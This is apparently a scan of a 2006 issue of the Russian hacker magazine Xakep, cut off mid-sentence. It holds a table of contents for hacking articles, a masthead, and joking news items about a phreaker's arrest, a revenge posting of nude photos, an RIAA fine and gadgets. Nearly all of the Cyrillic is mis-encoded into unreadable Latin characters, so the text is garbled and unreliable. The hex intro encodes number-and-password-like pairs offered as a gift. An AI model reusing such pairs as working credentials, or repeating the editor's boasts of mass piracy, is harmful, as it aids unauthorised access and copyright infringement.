Issuu on Google+


INTRO

 ÍÎÂÛÉ ÃÎÄ Ñ HEX’ÎÌ!

CAEEECE0EDE4E020E6F3F0EDE0EBE020D5E0EAE5F020EDE5E6EDEE20EE E1EDE8ECE0E5F220F2E5E1FF2E20C820E4E0F0E8F220F1EAF0EEECEDFBE920EFEEE4E0F0EEEA3A 3630343231333B6E75545E46766E31 3834323835373B4B646E4742727432 3539313433323B356E6A407A793132 3930313536333B78766D33347A6331 3734363032313B6D69336E7A683240

... È ÍÅ ÇÀÁÓÄÜ ÏÎÄÏÈÑÀÒÜÑß


INTRO..............................................................1 MEGANEWS....................................................4

FERRUM

ÏÀÌßÒÜ Â ÊÀÐÌÀÍÅ...................................24

PC_ZONE

ÌÀÃÈ×ÅÑÊÈÉ ÑÂÈÒÎÊ...............................24 ÏÐÎÙÀÉ, ÒÅËÅÔÎÍÍÀß ÑÅÒÜ..................33 ÆÅÑÒÊÀß ÊÎÍÑÏÈÐÀÖÈß.........................40

ÄÈÇÀÉÍ

ÐÈÑÓÅÌ Â PAINTER IX................................42

VZLOM

HACK-FAQ.....................................................48 ÎÒÊÓÄÀ ÁÅÐÓÒÑß ØÅËË-ÊÎÄÛ................50 ÙÈÒ ÄËß WEB-ÊÎÍÒÅÍÒÀ.........................56 ÆÆÎÌ ÀÂÒÎÐÀ...........................................60 ÍÅÂÈÄÈÌÀß ÂÎÉÍÀ...................................64 ÏÎÑÈÍÅÂØÈÉ PIN......................................68 ÂÅÑÅËÛÉ ÊÎÍÊÓÐÑ...................................74 ÎÁÇÎÐ ÝÊÑÏËÎÉÒÎÂ................................77 ÑÏÀÌ Ñ ÍÓËß.............................................. 80 Õ-ÊÎÍÊÓÐÑ...................................................81

SCENE

ÈÑÒÎÐÈß ÎÄÍÎÃÎ Å-ØÎÏÀ...........................82 ÊÀÊ ÇÀÐÎÆÄÀËÑß ÊÈÁÅÐÏÀÍÊ....................86 ÎÁÍÀÆÅÍÍÛÉ ÈÍÒÅÐÍÅÒ..............................90 ÑÎÂÐÅÌÅÍÍÛÉ ÊÈÁÅÐÑÏÎÐÒ.......................94

UNIXOID

ÇÀÂÎÄÍÎÉ ÏÈÍÃÂÈÍ.....................................114 SPAMD — ÑÅÊÐÅÒÍÛÉ ÊÎÍÒÐÓÄÀÐ...........106 ÊÀÏÈÒÓËßÖÈß ÇÀÙÈÒÍÛÕ ÌÅÕÀÍÈÇÌÎÂ..110

CODING

ÆÈÇÍÜ ÏÎÑËÅ BSOD.....................................114 ÏÀÍÅËÜ ÄËß ÏÐÎÊÑÅÉ.................................120 ÝÍÖÈÊËÎÏÅÄÈß SPYWARE.........................124

CREATIFF

ÒÅÑÒÅÐ.............................................................128

UNITS

WWW.....................................................................138 FAQ.....................................................................140 ÄÈÑÊÎ..............................................................114 ØÀÐÎWAREZ...................................................147 Å-MAIL...............................................................156 ÕÓÌÎÐ..............................................................158


/ÐÅÄÀÊÖÈß >Ãëàâíûé ðåäàêòîð Èâàí «CuTTer» Ïåòðîâ (cutter@real.xakep.ru) >Çàìãëàâðåä Íèêèòà «Nikitos» Êèñëèöèí (nikitoz@real.xakep.ru) >Âûïóñêàþùèé ðåäàêòîð Àëåêñàíäð «Dr.Klouniz» Ëîçîâñêèé (alexander@real.xakep.ru) >Ðåäàêòîðû ðóáðèê ÂÇËÎÌ Íèêèòà «Nikitos» Êèñëèöèí (nikitoz@real.xakep.ru) PC_ZONE è UNITS Àðòåì «b00b1ik» Àíèêèí (b00b1ik@real.xakep.ru) ÑÖÅÍÀ Îëåã «mindw0rk» ×åáåíååâ (mindw0rk@real.xakep.ru) UNIXOID Àíäðåé «Andrushock» Ìàòâååâ (andrushock@real.xakep.ru) ÊÎÄÈÍà Íèêîëàé «GorluM» Àíäðååâ

(gorlum@real.xakep.ru) ÈÌÏËÀÍÒ Àëåêñ Öåëûõ (editor@technews.ru) DVD/CD Ñòåïàí «Step» Èëüèí (step@real.xakep.ru) ÂÈÄÅÎ ÏÎ ÂÇËÎÌÓ Îëåã «NSD» Òîëñòûõ (nsd@nsd.ru) >Ëèòåðàòóðíûé ðåäàêòîð Àííà Áîëüøîâà /ART >Àðò-ä äèðåêòîð Êîíñòàíòèí Îáóõîâ (obukhov@real.xakep.ru) >Äèçàéíåðû -- nobody -/INET >WebBoss Ñêâîðöîâà Àëåíà (Alyona@real.xakep.ru) >Ðåäàêòîð ñàéòà Ëåîíèä Áîãîëþáîâ (xa@real.xakep.ru)

/ÐÅÊËÀÌÀ >Äèðåêòîð ïî ðåêëàìå gameland Èãîðü Ïèñêóíîâ (igor@gameland.ru) > Ðóêîâîäèòåëü îòäåëà ðåêëàìû öèôðîâîé ãðóïïû Áàñîâà Îëüãà (olga@gameland.ru) >Ìåíåäæåðû îòäåëà Åìåëüÿíöåâà Îëüãà (olgaeml@gameland.ru) Àëåõèíà Îêñàíà (alekhina@gameland.ru) Àëåêñàíäð Áåëîâ (belov@gameland.ru) Ãîðÿ÷åâà Åâãåíèÿ (goryacheva@gameland.ru) > Òðàôèê ìåíåäæåð Ìàðüÿ Àëåêñååâà (alekseeva@gameland.ru) /PUBLISHING >Èçäàòåëü Ñåðãåé Ïîêðîâñêèé (pokrovsky@gameland.ru) >Ó÷ðåäèòåëü ÎÎÎ «Ãåéì Ëýíä» >Äèðåêòîð Äìèòðèé Àãàðóíîâ (dmitri@gameland.ru)

>Ôèíàíñîâûé äèðåêòîð Áîðèñ Ñêâîðöîâ (boris@gameland.ru) /ÎÏÒÎÂÀß ÏÐÎÄÀÆÀ >Äèðåêòîð îòäåëà äèñòðèáóöèè è ìàðêåòèíãà Âëàäèìèð Ñìèðíîâ (vladimir@gameland.ru) >Îïòîâîå ðàñïðîñòðàíåíèå Ñòåïàíîâ Àíäðåé (andrey@gameland.ru) >Ñâÿçü ñ ðåãèîíàìè Íàñåäêèí Àíäðåé (nasedkin@gameland.ru) >Ïîäïèñêà Ïîïîâ Àëåêñåé (popov@gameland.ru) òåë.: (095) 935.70.34 ôàêñ: (095) 780.88.24 > ÃÎÐß×Àß ËÈÍÈß ÏÎ ÏÎÄÏÈÑÊÅ òåë.: 8 (800) 200.3.999 Áåñïëàòíî äëÿ çâîíÿùèõ èç Ðîññèè > ÄËß ÏÈÑÅÌ 101000, Ìîñêâà, Ãëàâïî÷òàìò, à/ÿ 652, Õàêåð magazine@real.xakep.ru http://www.xakep.ru

Çàðåãèñòðèðîâàíî â Ìèíèñòåðñòâå Ðîññèéñêîé Ôåäåðàöèè ïî äåëàì ïå÷àòè, òåëåðàäèîâåùàíèþ è ñðåäñòâàì ìàññîâûõ 11802 êîììóíèêàöèé ÏÈ ß 77-1 îò 14 ôåâðàëÿ 2002 ã. Îòïå÷àòàíî â òèïîãðàôèè «ScanWeb», Ôèíëÿíäèÿ Òèðàæ 100 000 ýêçåìïëÿðîâ. Öåíà äîãîâîðíàÿ. Ìíåíèå ðåäàêöèè íå îáÿçàòåëüíî ñîâïàäàåò ñ ìíåíèåì àâòîðîâ. Ðåäàêöèÿ óâåäîìëÿåò: âñå ìàòåðèàëû â íîìåðå ïðåäîñòàâëÿþòñÿ êàê èíôîðìàöèÿ ê ðàçìûøëåíèþ. Ëèöà, èñïîëüçóþùèå äàííóþ èíôîðìàöèþ â ïðîòèâîçàêîííûõ öåëÿõ, ìîãóò áûòü ïðèâëå÷åíû ê îòâåòñòâåííîñòè. Ðåäàêöèÿ â ýòèõ ñëó÷àÿõ îòâåòñòâåííîñòè íå íåñåò. Ðåäàêöèÿ íå íåñåò îòâåòñòâåííîñòè çà ñîäåðæàíèå ðåêëàìíûõ îáúÿâëåíèé â íîìåðå. Çà ïåðåïå÷àòêó íàøèõ ìàòåðèàëîâ áåç ñïðîñà — ïðåñëåäóåì.


MEGA

NEWS

HITECHNEWS Ôåäîð Ãàëêîâ (fm@real.xakep.ru) HARDNEWS Ñåðãåé Íèêèòèí ][NEWS mindw0rk (mindw0rk@gameland.ru)

][NEWS

ÍÅÁÎ Â ÊËÅÒÎ×ÊÓ ËÀÁÎÐÀÒÎÐÈß, ÎÁÚÅÄËß ÏÀÊÈÑÒÀÍÑÊÎÃÎ ÄÈÍÈÂØÀß GOOGLE ÔÐÈÊÅÐÀ È MICROSOFT Íà Óêðàèíå â ãîðîäå Ïåðâîìàéñê Íèêîëàåâñêîé îáëàñòè îðãàíàì óäàëîñü çàäåðæàòü ôðèêåðà, óæå äîëãîå âðåìÿ çâîíèâøåãî ïî ìåæãîðîäó ñ ïîìîùüþ ïîääåëüíûõ òàêñîôîííûõ êàðò. Ðàáîòàþò òàêèå êàðòû ïî ïðèíöèïó ýìóëÿòîðîâ: ñíà÷àëà ãåíåðèðóþò íîìåð òåëåôîííîé êàðòî÷êè, çàòåì áëîêèðóþò â òàêñîôîíå òàðèôèêàöèþ çâîíêà. Çëîñ÷àñòíûì ôðèêåðîì îêàçàëñÿ âûõîäåö èç Ïàêèñòàíà, íå èìåþùèé ê òîìó æå ãðàæäàíñòâà. Çàäåðæàëè åãî ïðÿìî â áóäêå, îòêóäà îí ïûòàëñÿ íà õàëÿâó ïîçâîíèòü ñâîèì ïàêèñòàíñêèì ðîäñòâåííèêàì. Ìèëèöèÿ â ýòîì äåëå, êîíå÷íî, îòîðâàëîñü íà âñå ñòî. Ìàëî òîãî, ÷òî åå âûñìåèâàþò çà áåñïîìîùíîñòü â ðàñêðûòèè êîìïüþòåðíûõ äåë, òàê åùå è êàêîé-òî èçóâåð ðåøèë îáëàïîøèòü óêðàèíñêîå ïðàâèòåëüñòâî. Âåðäèêò íà ñóäå áûë ñóðîâ: ïîäñóäèìûé íàíåñ íåïîïðàâèìûé óùåðá îïåðàòîðó ñâÿçè, âèíîâåí è îòïðàâëÿåòñÿ çà áåòîííûå ñòåíû ñðîêîì íà 3 ãîäà.

ÂÇÁÅØÅÍÍÀß ÑÅÑÈËÈß ÏÐÎÒÈ YAHOO Æèëà-áûëà Ñåñèëèÿ Áýéðíñ. Íå ñàìà æèëà, à ñ áîé-ôðåíäîì Ðýíäîëüôîì. Êàê ÷àñòî áûâàåò, ñî âðåìåíåì ïàðî÷êà ïðèåëàñü äðóã äðóãó, íà÷àëèñü ññîðû, ñêàíäàëû. È â îäèí ïðåêðàñíûé äåíü Ñåñèëèÿ çàÿâèëà: «Èìïîòåíò! Ìíå íóæåí íàñòîÿùèé ìóæ÷èíà, æåðåáåö. Óáèðàéñÿ âîí, íè íà ÷òî íå ãîäíûé çàñðàíåö!». Ðýíäîëüô óøåë, íî èñòîðèÿ íà ýòîì íå çàêîí÷èëàñü. «Èìïîòåíò» îêàçàëñÿ ìñòèòåëüíûì, è, ÷òîáû íàñîëèòü áûâøåé ïîäðóæêå, çàøåë íà ñåðâèñ çíàêîìñòâ êîìïàíèè Yahoo, çàðåãèë òàì àíêåòó è ðàçìåñòèë â íåé îáíàæåííûå ôîòêè Ñåñèëèè. À â êîíòàêòàõ óêàçàë åå ðàáî÷èé òåëåôîí, ìîáèëüíèê è åìåéë. Òàê êàê ôîðìàìè Ñåñèëèþ ïðèðîäà íå îáäåëèëà, ïðåäëîæåíèÿ «ïî-äðóæåñêè ÷ïîêíóòüñÿ» ïîñûïàëèñü óæå íà ñëåäóþùèé äåíü, è ñ êàæäûì äíåì èõ ñòàíîâèëîñü âñå áîëüøå. Æåíùèíà ïîïûòàëàñü óáðàòü àíêåòó, ñâÿçàâøèñü ñ àäìèíèñòðàöèåé ñåðâèñà, íî òàì åå æàëîáû ïðîèãíîðèðîâàëè. Òîãäà îíà ïîäàëà íà Yahoo â ñóä. «Òðè ìèëëèîíà áàêñîâ, è ìîÿ ïñèõîëîãè÷åñêàÿ òðàâìà ñìîæåò çàðàñòè», — âîñêëèêíóëà ìàäàì. Ïîêà íåèçâåñòíî, ñêîëüêî äåíåã äîñòàíåòñÿ Ñåñèëèè. Íî ÿ áóäó ñëåäèòü çà ïðîäîëæåíèåì ýòîé èñòîðèè è ðàññêàæó, ÷åì îíà çàêîí÷èëàñü.

4

Ïîñëå ìíîãî÷èñëåííûõ ïåðåáðàíîê è ñóäåáíûõ ðàçáèðàòåëüñòâ ìåæäó Google è Microsoft, êòî áû ìîã ïîäóìàòü, ÷òî äâå ýòè êîìïàíèè âñêîðå íà÷íóò ñîòðóäíè÷àòü. Ê íèì ïðèñîåäèíèëàñü Sun Microsystems, êîòîðàÿ òîæå âîþåò ñ Microsoft, íî èìååò òåïëûå îòíîøåíèÿ ñ Google. Ïðîåêòîì, êîòîðûé îáúåäèíèë âðàæäóþùèå ñòîðîíû, ñòàëà èññëåäîâàòåëüñêàÿ ëàáîðàòîðèÿ RAD (Áåçîòêàçíûå Àäàïòèâíûå Ðàñïðåäåëåííûå Ñèñòåìû), îñíîâàííàÿ ïðè Êàëèôîðíèéñêîì óíèâåðñèòåòå Áåðêëè. Òðè IT-ãèãàíòà íà ðàâíûõ ïàÿõ âëîæèëè â íåå 7,5 ìèëëèîíîâ è óñòàíîâèëè åæåãîäíûé áþäæåò â ðàçìåðå 1,5 ìèëëèîíà äîëëàðîâ, ïîñòóïàþùèå îò êàæäîé èç ýòèõ êîìïàíèé. Öåëü ëàáîðàòîðèè — ðàçðàáîòêà ñåòåâîãî ÏÎ, êîòîðîå ïîìîæåò çàïóñêàòü êðóïíûå èíòåðíåò-ïîðòàëû òèïà eBay.com è Amazon.com. Ïîêà â ëàáîðàòîðèè ðàáîòàåò 16 ÷åëîâåê, ñðåäè êîòîðûõ ïðîôåññîðà è îäàðåííûå âûïóñêíèêè óíèâåðñèòåòà Áåðêëè, à ðóêîâîäèòåëåì íàçíà÷èëè ïðîôåññîðà Äýâèäà Ïàòòåðñîíà. Êîíå÷íî, ïîñëå íîâîñòè î ñîòðóäíè÷åñòâå, ïîïîëçëè ñëóõè, ÷òî âîéíå ìåæäó ìîíñòðàìè IT-èíäóñòðèè ïðèøåë êîíåö. Íî âåäóùèé èññëåäîâàòåëü Microsoft Äæåéìñ Ëàðóñ îïðîâåðã èõ ñâîèì çàÿâëåíèåì, ÷òî ñîãëàøåíèå áûëî çàêëþ÷åíî íå ðàäè ïåðåìèðèÿ, à òîëüêî ïîòîìó, ÷òî ïðèíåñåò âûãîäó âñåì òðåì ñòîðîíàì.

ÑÊÀ×ÀË MP3? ÏËÀÒÈ ØÒÐÀÔ Â ×èêàãî çàêîí÷èëñÿ ñóä íàä Öåöëèåé Ãîíçàëåñ, êîòîðóþ îáâèíèëè â íåçàêîííîì ñêà÷èâàíèè ìóçûêè èç Èíòåðíåòà. Íà êîìïüþòåðå äàìî÷êè õðàíèëîñü îêîëî òûñÿ÷è êîìïîçèöèé â ôîðìàòå mp3. «È ÷å?» — ñïðîñèøü òû. «À âîò ïëàòè 22,5 òûñÿ÷è äîëëàðîâ!» — âûíåñ ïðèãîâîð ñóä. Äàìî÷êå åùå ïîâåçëî, ÷òî îáâèíåíèÿ çâóêîçàïèñûâàþùåé êîìïàíèè RIAA, ïîäàâøåé íà íåå èñê, êàñàëèñü òîëüêî 30 ïåñåí. È ñóììà øòðàôà ïîëó÷èëàñü èç ðàñ÷åòà 750 äîëëàðîâ çà êàæäóþ. Âîîáùå, RIAA óæå äîëãî ïðèñìàòðèâàëàñü ê ìàäàì Ãîíçàëåñ è äî ýòîãî ïðåäëàãàëà «çëîñòíîé íàðóøèòåëüíèöå» âûïëàòèòü 3,5 êîñàðåé, ÷òîáû çàìÿòü èíöèäåíò. Ìàäàì Ãîíçàëåñ îòêàçàëàñü, è äåëî äîøëî äî ñóäà. Ýêñïåðòû ñ÷èòàþò, ÷òî ýòîò ïðîöåññ ñòàíåò ïîâîðîòíûì â áîðüáå ñ íàðóøèòåëÿìè àâòîðñêèõ ïðàâ, òàê êàê òàêîãî íàêàçàíèÿ çà ïðîñòîå ñêà÷èâàíèå ïåñåíîê íå ïîëó÷àë åùå íèêòî. Ðÿäîâûå èíòåðíåò÷èêè æå ñ÷èòàþò, ÷òî ó RIAA êðûøà åäåò. Ïîëüçóÿñü ñëó÷àåì, õî÷ó ïðèçíàòüñÿ, ÷òî ó ìåíÿ íà êîìïå áîëüøå 40 òûñÿ÷ mp3'øåê, à ó ìîåãî ñîñåäà Áîðè — áîëåå 50 òûñÿ÷. È RIAA ìîæåò ïîöåëîâàòü íàñ â çàä :). XÀÊÅÐ 01 /85/ 06


][NEWS

HITECHNEWS

SMS-ÊÀÌÈÊÀÄÇÅ

ÄÎÁÐÎÂÎËÜÍÀß ÏÛÒÊÀ ÕÎÑÒÈÍÃÑÅÐÂÈÑ

Èíòåðåñíóþ óñëóãó ïðåäëîæèëà áðèòàíñêèì æèòåëÿì êîìïàíèÿ Staellium UK. Íàçûâàåòñÿ îíà StealthText è ïðåäñòàâëÿåò ñîáîé SMSêè, êîòîðûå óíè÷òîæàþòñÿ ñðàçó ïîñëå ïðî÷òåíèÿ. Òåïåðü òåáå íå ïðèäåòñÿ áîÿòüñÿ, ÷òî ñîîáùåíèå «ñîëíûøêî, ó íàñ ñåãîäíÿ ðîìàíòè÷åñêèé óæèí íà äâîèõ, êóïè ïî äîðîãå ïðåçåðâàòèâîâ», îòïðàâëåííîå íà ìîáèëüíèê æåíû áîññà, ñëó÷àéíî ïîïàäåò íà ãëàçà Ñåðãåþ Ïåòðîâè÷ó. Ïðàâäà, íèêàêèõ íåéðîííî-àòîìíûõ ðåâîëþöèîííûõ îòêðûòèé â ýòîé òåõíîëîãèè íåò. Ïðîñòî àäðåñàòó ïðèõîäèò èìÿ îòïðàâèòåëÿ è ññûëêà íà òåêñò, êîòîðàÿ ïåðåñòàíåò ðàáîòàòü ÷åðåç 40 ñåêóíä ïîñëå ïðî÷òåíèÿ. Íîâèíêîé óæå óñïåëè çàèíòåðåñîâàòüñÿ ôèíàíñîâûå êîìïàíèè è Ìèíèñòåðñòâî îáîðîíû Âåëèêîáðèòàíèè, â 2006 ãîäó Staellium ïëàíèðóåò ïðîäâèãàòü åå â îñòàëüíûå ñòðàíû Åâðîïû, ÑØÀ è Àçèþ. Ïðè÷åì íà îäíèõ SMS êîìïàíèÿ çàöèêëèâàòüñÿ íå ñîáèðàåòñÿ. Ïî ñëîâàì ïðåçèä��íòà Staellium Êýðîëà Áàðíóìà, îíè óæå ïðèñòóïèëè ê ïîäãîòîâêå íîâûõ ñåðâèñîâ: ñàìîóíè÷òîæàþùèõñÿ åìåéëîâ, ñàìîðàçðóøàþùèõñÿ ãîëîñîâûõ ñîîáùåíèé è ñàìîàííèãèëèðóþùèõñÿ êàðòèíîê. Íå çíàþ, êàê âû, à ÿ áû çàîäíî ïðåäïî÷åë ñàìîèñïàðÿþùóþñÿ æåíó, õîòÿ áû íà ãîä.

ÃÅÐÎÈ È ÂÐÀÃÈ ÈÍÒÅÐÍÅÒÀ Êòî, ïî-òâîåìó, ãëàâíûé âðàã Èíòåðíåòà? Òâîé ïðîâàéäåð? Áèëë Ãåéòñ? Ìûñëè ìàñøòàáíåå, ÷óâàê! ×òîáû îïðåäåëèòü íàñòîÿùèõ âðàãîâ è ãåðîåâ èíåòà, êîàëèöèÿ áðèòàíñêèõ ïðîâàéäåðîâ ISPA ïðîàíàëèçèðîâàëà òûñÿ÷è êîìïàíèé è îðãàíèçàöèé. È íåäàâíî îáúÿâèëà ñïèñîê íîìèíàíòîâ, èç êîòîðûõ â íà÷àëå 2006 ãîäà îòáåðóò ïîáåäèòåëåé.  òðîéêó ñàìûõ çëîñòíûõ âðàãîâ âîøëè: Åâðîêîìèññèÿ (çà ïîïûòêè ðåãóëèðîâàòü ñîäåðæèìîå èíòåðíåò-ðåñóðñîâ), êîíöåðí Sony BMG (çà çàùèòó ìóçûêàëüíûõ äèñêîâ, ñðàâíèìóþ ïî âðåäîíîñíîñòè ñ êîìïüþòåðíûìè âèðóñàìè) è… Ðîññèéñêîå ïðàâèòåëüñòâî (çà ñâîþ íåñîñòîÿòåëüíîñòü ïðîòèâîñòîÿòü êîìïüþòåðíûì ïðåñòóïëåíèÿì). Ãåðîåì ãîäà ñòàíåò îäèí èç òðåõ ïðåòåíäåíòîâ: Áðèòàíñêîå Ïàðëàìåíòñêîå Îáúåäèíåíèå APIG (çà óëó÷øåíèå çàêîíîâ Âåëèêîáðèòàíèè â îòíîøåíèè Ñåòè), îðãàíèçàöèÿ OTA (çà êîíòðîëü íàä öåíàìè è òàðèôàìè ïðîâàéäåðîâ) è ðåãóëèðóþùèé îðãàí Ofcom (çà ïîääåðæàíèå ñòàáèëüíîñòè ðûíêà ïëàòíûõ òåëåôîííûõ óñëóã). Õîòü óáåéòå, íå ïîíèìàþ, ïî êàêèì êðèòåðèÿì îòáèðàëè íîìèíàíòîâ è ïî÷åìó â ñïèñîê âðàãîâ íå âîøëà RIAA, êîòîðàÿ óæå êàêîé ãîä âîþåò ïðîòèâ âñåãî Èíòåðíåòà. Êîàëèöèè, íàâåðíîå, âèäíåå. Êàê ïî ìíå, òàê ãëàâíûé âðàã ìèðîâûõ ñðåäñòâ ñâÿçè — ìîÿ ñîñåäêà òåòÿ Âàðÿ. Äóðà, îáîðâàëà êàáåëü, ñîâñåì ïîä íîãè íå ñìîòðèò.

6

Åñòü òàêîé çàìå÷àòåëüíûé ìåòîä «êíóòà è ïðÿíèêà». Äåéñòâóåò áåçîòêàçíî!  ïðèíöèïå, äàæå íàëè÷èå ïðÿíèêà ñîâåðøåííî íå îáÿçàòåëüíî, äîñòàòî÷íî è îäíîãî êíóòà. À åñëè òû äóìàåøü, ÷òî ýòîò ìåòîä äàâíî óñòàðåë, è â öèâèëèçîâàííîì ìèðå åìó íåò ìåñòà, òî òû ãëóáîêî çàáëóæäàåøüñÿ. Ìîãó äàæå ïðåäëîæèòü òåáå èñïðîáîâàòü åãî íà ñåáå. Ñàìî ñîáîé, íå ñòîèò âîñïðèíèìàòü «êíóò» äîñëîâíî, åãî ñ ëåãêîñòüþ ìîæåò çàìåíèòü íîâûé óíèêàëüíûé äåâàéñ îò ÿïîíñêîé êîìïàíèè Taiyo Inc ïîä íàçâàíèåì BuzzTrainer. Ðàáîòàåò ýòà øòóêà òàê: íà ðóêó íàäåâàåòñÿ íåáîëüøîé íàïóëüñíèê, îò êîòîðîãî òÿíåòñÿ ïðîâîä ê USB-ðàçúåìó, â êîìïëåêòå òàêæå èäåò ñïåöèàëüíûé ñîôò, íåîáõîäèìûé äëÿ ðàáîòû óñòðîéñòâà. Åñëè ïðè ðàáîòå çà êîìïîì òû ñäåëàåøü ÷òî-òî íå òàê, íàïðèìåð, îïå÷àòêó ïðè íàáîðå òåêñòà â Word'å, òî ïîëó÷èøü ñëàáûé, íî çàìåòíûé ýëåêòðè÷åñêèé ðàçðÿä.  ñëåäóþùèé ðàç (åñëè òû, êîíå÷íî, íå ôàíàò ìàçîõèçìà) ñêîðåå âñåãî äàííóþ îøèáêó óæå íå ïîâòîðèøü. Ïðîâåäÿ íåáîëüøîå èññëåäîâàíèå, ðàçðàáîò÷èêè óáåäèëèñü, ÷òî êîëè÷åñòâî îïå÷àòîê ïðè èñïîëüçîâàíèè BuzzTrainer çàìåòíî óìåíüøàåòñÿ. Êñòàòè, ïîìèìî ñëåæåíèÿ çà îïå÷àòêàìè, äåâàéñ ìîæåò íàêàçûâàòü è çà çàíÿòèÿ âñÿêèìè íåïîäîáàþùèìè âåùàìè, ê ïðèìåðó, ïðè çàõîäå íà ïîðíîñàéò èëè â ÷àò, ïðè ÷ðåçìåðíîì óâëå÷åíèè èãðîé èëè ñêà÷èâàíèè íåëåãàëüíîé ìóçûêè… Ïîýòîìó ðàçðàáîò÷èêè ðåêîìåíäóþò ñâîé òîâàð è çàáîòëèâûì ìàìàøàì, êîòîðûå ïî-ïðåæíåìó óâåðåíû, ÷òî êîìïüþòåð èõ ÷àäàì íóæåí òîëüêî äëÿ ó÷åáû. Êñòàòè, îêàçûâàåòñÿ, ÷òî BuzzTrainer íå òàêîé óæ è áåçîáèäíûé, òàê ÷òî íå ðåêîìåíäóåòñÿ áåðåìåííûì è äåòÿì äî 12 ëåò.

ÑÏÈÄÎÌÅÒÐ ÏÎ WI-FI

Äàâíî èçâåñòíî, ÷òî ïîäàâëÿþùåå áîëüøèíñòâî àâòîêàòàñòðîô ïðîèñõîäèò ïî ïðè÷èíå íàðóøåíèÿ ïðàâèë äîðîæíîãî äâèæåíèÿ, à ïðåèìóùåñòâåííî — èç-çà ïðåâûøåíèÿ ñêîðîñòè (îêîëî 25% îò âñåõ àâàðèé). Âîò òîëüêî êàê óáåäèòü â ýòîì ñàìèõ âîäèòåëåé? Âñÿêèå ïðîôèëàêòè÷åñêîðàçúÿñíèòåëüíûå ìåðîïðèÿòèÿ, åñòåñòâåííî, íè ê ÷åìó íå ïðèâîäÿò, à øòðàôû îñåäàþò èñêëþ÷èòåëüíî â êàðìàíàõ ãàèøíèêîâ. Îäíàêî âëàñòè Êàíàäû ïîäîáðàëè ïîäõîäÿùèé ðåöåïò. Îòíûíå ñ äàííûìè íàðóøèòåëÿìè áóäóò áîðîòüñÿ ñàìûì ðàäèêàëüíûì ñïîñîáîì. Íåò, ëþáèòåëåé áûñòðîé åçäû, êîíå÷íî, íå áóäóò ñàæàòü íà ýëåêòðè÷åñêèé ñòóë, ïðîñòî-íàïðîñòî ïëàíèðóåòñÿ îáîðóäîâàòü âñå (ïî âîçìîæíîñòè) ìàøèíû ñïåöèàëüíûìè îãðàíè÷èòåëÿìè ñêîðîñòè. Òåïåðü âñå ïîïûòêè âûéòè íà ïåðâóþ êîñìè÷åñêóþ ñêîðîñòü áóäåò ïðåñåêàòü ñàì àâòîìîáèëü: ïðè ïðèáëèæåíèè ê ñêîðîñòíîìó îãðàíè÷åíèþ ïåäàëü ãàçà áóäåò âñå ñèëüíåå ñîïðîòèâëÿòüñÿ íàæàòèþ. Èíôîðìàöèÿ î òîì, ãäå è êàêàÿ ñêîðîñòü ðàçðåøåíà, áóäåò îïðåäåëÿòüñÿ ïðè ïîìîùè âñòðîåííîãî ìîäóëÿ GPS, êîòîðûé ñìîæåò ñâåðÿòü ìåñòîïîëîæåíèÿ áîëèäà ñ êàðòîé ðàçðåøåííûõ ñêîðîñòåé. Äàííàÿ ñèñòåìà óæå ïðîòåñòèðîâàíà â Ñåâåðíîé Àìåðèêå, Øâåöèè, Íèäåðëàíäàõ è Áðèòàíèè, ãäå ïîêàçàëà îòëè÷íûå ðåçóëüòàòû. Âïðî÷åì, äàííûé äåâàéñ áîëüøèíñòâî âîäèòåëåé ÿâíî âñòðåòÿò ñ îòêðîâåííûì íåãîäîâàíèåì, è ïîêà åùå íåïîíÿòíî, êàê çàñòàâèòü âñåõ ïîãîëîâíî èì îáçàâåñòèñü. XÀÊÅÐ 01 /85/ 06


HITECHNEWS

ÍÎÂÛÉ ÃÓÌÀÍÎÈÄ

HARDNEWS

ÄËß ËÞÁÈÌÛÕ ÓØÅÉ

Êîìïàíèÿ Honda ïðîäåìîíñòðèðîâàëà íîâóþ âåðñèþ ñâîåãî çíàìåíèòîãî ðîáîòà ASIMO, êîòîðûé â ïîñëåäíåå âðåìÿ ñòàë îäíîé èç îñíîâíûõ âèçèòíûõ êàðòî÷åê ôèðìû. Ïðèíöèïèàëüíûõ íîâîââåäåíèé â íîâèíêå ïîÿâèëîñü íå òàê ìíîãî. Îòíûíå ASIMO ñïîñîáåí õîäèòü ïðàêòè÷åñêè ñî ñêîðîñòüþ îáû÷íîé ïîõîäêè ÷åëîâåêà (ïðèìåðíî 6 êì/÷), è âî âðåìÿ äâèæåíèÿ ìîæåò äåðæàòü ÷åëîâåêà çà ðóêó. À òàêæå ðîáîòà îáó÷èëè âûïîëíÿòü ðàçëè÷íóþ íåñëîæíóþ ðàáîòó ïî îôèñó: ìîæåò ðàçíîñèòü íåêîòîðûå ïðåäìåòû (íàïðèìåð, ãîðÿ÷èé êîôå), ïëþñ ïåðåäàâàòü çàäàííóþ èíôîðìàöèþ. Íîâûé ASIMO óæå ïîñòóïèë â ïðîäàæó, è ðàçðàáîò÷èêè íàäåþòñÿ, ÷òî íàéäåòñÿ íåìàëî ïîêóïàòåëåé, êîòîðûå âìåñòî ñåêðåòàðø ïðåäïî÷òóò íàñòîÿùåãî ðîáîòà. Òî÷íàÿ öåíà íà ðîáîòà ïîêà íå ðàçãëàøàåòñÿ, îäíàêî ÷òî-òî ìíå ïîäñêàçûâàåò, ÷òî çà òå æå ñàìûå äåíüãè ìîæíî áóäåò íàíÿòü öåëûé âçâîä äëèííîíîãèõ ñåêðåòàðø, è äàëåêî íå ôàêò, ÷òî îíè áóäóò ìåíåå ýôôåêòèâíû.

Åñëè ïóòü ê ñåðäöó ìóæ÷èíû, êàê ãëàñèò íàðîäíàÿ ìóäðîñòü, ëåæèò ÷åðåç åãî æåëóäîê, òî, ñîîòâåòñòâåííî, æåíùèíà ëþáèò óøàìè. Íî çíàòü ýòî ìàëî, íóæíî óìåòü âîñïîëüçîâàòüñÿ çíàíèåì. Ñäåëàòü ýòî ìîæíî òàê: ïîñòàâèòü ó ñåáÿ â êîìíàòå êà÷åñòâåííûå è ñòèëüíûå êîëîíêè AVE D90 è òîãäà óñïåõ ó êðàñàâèö òåáå ãàðàíòèðîâàí. Äèíàìèêè â íèõ ðàñïîëîæåíû ïî òåõíîëîãèè D’Apollito: ñðåäíèå ÷àñòîòû â íèõ âîñïðîèçâîäÿò äâà äðàéâåðà ñ 2,5-äþéìîâûì áóìàæíûì äèôôóçîðîì-÷àøêîé, à òàêæå äþéìîâûé òâèòåð ñ êóïîëüíûì èçëó÷àòåëåì (âåðîÿòíî, îí áóäåò âûïîëíåí èç òêàíè). Âîñïðîèçâåäåíèå æå áàñà âîçëîæåíî íà âíóøèòåëüíûé äèíàìèê ñ 6-äþéìîâûì äèôôóçîðîì, 